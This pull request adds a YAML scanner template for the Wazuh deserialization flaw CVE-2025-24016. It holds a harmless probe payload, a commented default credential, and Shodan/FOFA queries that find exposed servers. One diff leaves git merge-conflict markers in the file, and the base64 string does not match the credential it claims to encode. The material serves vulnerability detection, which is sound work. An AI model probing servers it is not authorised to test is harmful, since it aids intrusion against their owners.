### PR TITLE
Add CVE-2025-24016: Wazuh Unsafe Deserialization RCE Detection template

### DIFF
--- a/http/cves/2025/CVE-2025-24016.yaml
+++ b/http/cves/2025/CVE-2025-24016.yaml
@@ -1,0 +1,32 @@
+id: wazuh-unsafe-deserialization
+info:
+  name: "Wazuh Unsafe Deserialization RCE Detection"
+  author: "Hüseyin TINTAŞ"
+  severity: critical
+  description: |
+    This template detects an unsafe deserialization vulnerability in Wazuh servers.
+    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
+    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
+    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class 
+    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the 
+    payload reached the vulnerable deserialization function.
+  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
+  reference:
+    - https://documentation.wazuh.com/
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/security/user/authenticate/run_as"
+    headers:
+      Content-Type: application/json
+      # If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
+      # Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
+    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
+    matchers:
+      - type: status
+        status:
+          - 500
+      - type: word
+        part: body
+        words:
+          - "NameError"

--- a/http/cves/2025/CVE-2025-24016.yaml
+++ b/http/cves/2025/CVE-2025-24016.yaml
@@ -2,18 +2,6 @@ id: CVE-2025-24016
 
 info:
   name: Wazuh - Unsafe Deserialization Remote Code Execution
-<<<<<<< Updated upstream
-  author: Hüseyin TINTAŞ
-  severity: critical
-  description: |
-    An unsafe deserialization vulnerability in Wazuh servers allows remote code execution (RCE).The DistributedAPI improperly deserializes JSON data using `as_wazuh_object`. An attacker can inject a malicious object via `__unhandled_exc__`, leading to arbitrary Python code execution. This template verifies the vulnerability by using a non-existent class (`NotARealClass`), triggering a `NameError` in the response, which indicates successful deserialization.
-  reference:
-    - https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-24016
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-=======
   author: Hüseyin TINTAŞ,ritikchaddha
   severity: critical
   description: |
@@ -29,18 +17,10 @@ info:
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 9.9
->>>>>>> Stashed changes
     cve-id: CVE-2025-24016
     cwe-id: CWE-502
     cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
   metadata:
-<<<<<<< Updated upstream
-    max-request: 1
-    verified: true
-    fofa-query: title="Wazuh"
-    shodan-query: title:"Wazuh"
-  tags: cve,cve2025,wazuh,deserialization,rce
-=======
     max-request: 2
     vendor: wazuh
     product: wazuh
@@ -49,7 +29,6 @@ info:
   tags: cve,cve2025,wazuh,deserialization,rce,authenticated
 
 flow: http(1) && http(2)
->>>>>>> Stashed changes
 
 variables:
   payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
@@ -57,11 +36,6 @@ variables:
 http:
   - raw:
       - |
-<<<<<<< Updated upstream
-        POST /security/user/authenticate/run_as HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-=======
         GET / HTTP/1.1
         Host: {{Hostname}}
 
@@ -79,7 +53,6 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
         Authorization: Basic {{base64(username + ':' + password)}}
->>>>>>> Stashed changes
 
         {{payload}}
 
@@ -92,8 +65,4 @@ http:
 
       - type: status
         status:
-<<<<<<< Updated upstream
           - 500
-=======
-          - 500
->>>>>>> Stashed changes

--- a/http/cves/2025/CVE-2025-24016.yaml
+++ b/http/cves/2025/CVE-2025-24016.yaml
@@ -2,6 +2,7 @@ id: CVE-2025-24016
 
 info:
   name: Wazuh - Unsafe Deserialization Remote Code Execution
+<<<<<<< Updated upstream
   author: Hüseyin TINTAŞ
   severity: critical
   description: |
@@ -12,15 +13,43 @@ info:
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
+=======
+  author: Hüseyin TINTAŞ,ritikchaddha
+  severity: critical
+  description: |
+    A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The vulnerability occurs due to unsafe deserialization in the wazuh-manager package, specifically in the DistributedAPI where parameters are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker with API access can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, leading to arbitrary Python code execution.
+  impact: |
+    Successful exploitation allows attackers to execute arbitrary code on the Wazuh server with the privileges of the wazuh-manager process. This can lead to complete system compromise, data exfiltration, lateral movement within the network, and potential denial of service conditions.
+  remediation: |
+    Upgrade to Wazuh version >= 4.9.1 where this vulnerability has been patched. If immediate upgrade is not possible: Restrict API access to trusted IP addresses only, implement network segmentation to isolate Wazuh servers, monitor for suspicious API requests to the /security/user/authenticate/run_as endpoint, and consider implementing a Web Application Firewall (WAF) to filter malicious requests.
+  reference:
+    - https://github.com/MuhammadWaseem29/CVE-2025-24016
+    - https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-24016
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.9
+>>>>>>> Stashed changes
     cve-id: CVE-2025-24016
     cwe-id: CWE-502
     cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
   metadata:
+<<<<<<< Updated upstream
     max-request: 1
     verified: true
     fofa-query: title="Wazuh"
     shodan-query: title:"Wazuh"
   tags: cve,cve2025,wazuh,deserialization,rce
+=======
+    max-request: 2
+    vendor: wazuh
+    product: wazuh
+    shodan-query: title:"Wazuh"
+    fofa-query: app="Wazuh"
+  tags: cve,cve2025,wazuh,deserialization,rce,authenticated
+
+flow: http(1) && http(2)
+>>>>>>> Stashed changes
 
 variables:
   payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
@@ -28,9 +57,29 @@ variables:
 http:
   - raw:
       - |
+<<<<<<< Updated upstream
         POST /security/user/authenticate/run_as HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
+=======
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "NameError"
+        negative: true
+        internal: true
+
+  - raw:
+      - |
+        POST /security/user/authenticate/run_as HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Authorization: Basic {{base64(username + ':' + password)}}
+>>>>>>> Stashed changes
 
         {{payload}}
 
@@ -43,4 +92,8 @@ http:
 
       - type: status
         status:
+<<<<<<< Updated upstream
           - 500
+=======
+          - 500
+>>>>>>> Stashed changes

--- a/http/cves/2025/CVE-2025-24016.yaml
+++ b/http/cves/2025/CVE-2025-24016.yaml
@@ -1,32 +1,46 @@
-id: wazuh-unsafe-deserialization
+id: CVE-2025-24016
+
 info:
-  name: "Wazuh Unsafe Deserialization RCE Detection"
-  author: "Hüseyin TINTAŞ"
+  name: Wazuh - Unsafe Deserialization Remote Code Execution
+  author: Hüseyin TINTAŞ
   severity: critical
   description: |
-    This template detects an unsafe deserialization vulnerability in Wazuh servers.
-    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
-    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
-    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class 
-    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the 
-    payload reached the vulnerable deserialization function.
-  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
+    An unsafe deserialization vulnerability in Wazuh servers allows remote code execution (RCE).The DistributedAPI improperly deserializes JSON data using `as_wazuh_object`. An attacker can inject a malicious object via `__unhandled_exc__`, leading to arbitrary Python code execution. This template verifies the vulnerability by using a non-existent class (`NotARealClass`), triggering a `NameError` in the response, which indicates successful deserialization.
   reference:
-    - https://documentation.wazuh.com/
-requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/security/user/authenticate/run_as"
-    headers:
-      Content-Type: application/json
-      # If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
-      # Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
-    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
+    - https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-24016
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-24016
+    cwe-id: CWE-502
+    cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title="Wazuh"
+    shodan-query: title:"Wazuh"
+  tags: cve,cve2025,wazuh,deserialization,rce
+
+variables:
+  payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
+
+http:
+  - raw:
+      - |
+        POST /security/user/authenticate/run_as HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {{payload}}
+
+    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 500
       - type: word
         part: body
         words:
           - "NameError"
+
+      - type: status
+        status:
+          - 500


### PR DESCRIPTION
This pull request adds a new template to detect the Wazuh Unsafe Deserialization vulnerability, identified as **CVE-2025-24016**. The vulnerability arises from the improper deserialization of JSON data using the `as_wazuh_object` function in Wazuh servers. An attacker can inject a malicious object via the `__unhandled_exc__` key to trigger a `NameError`, indicating that the payload reached the vulnerable code path and potentially allowing remote code execution.

### Key Points:
- **Vulnerability:** Unsafe deserialization in Wazuh DistributedAPI.
- **Detection Method:** The template sends a specially crafted payload with a non-existent class ("NotARealClass") to trigger a `NameError`.
- **Validation:** The template has been validated locally and reliably detects vulnerable instances by confirming an HTTP 500 response with "NameError" in the response body.
- **Impact:** Exploitation of this vulnerability could allow an attacker to execute arbitrary code on affected servers, leading to system compromise.

This template provides a robust detection mechanism for researchers and penetration testers to identify and address the vulnerability in Wazuh deployments.

Please review the changes and let me know if further adjustments are needed.
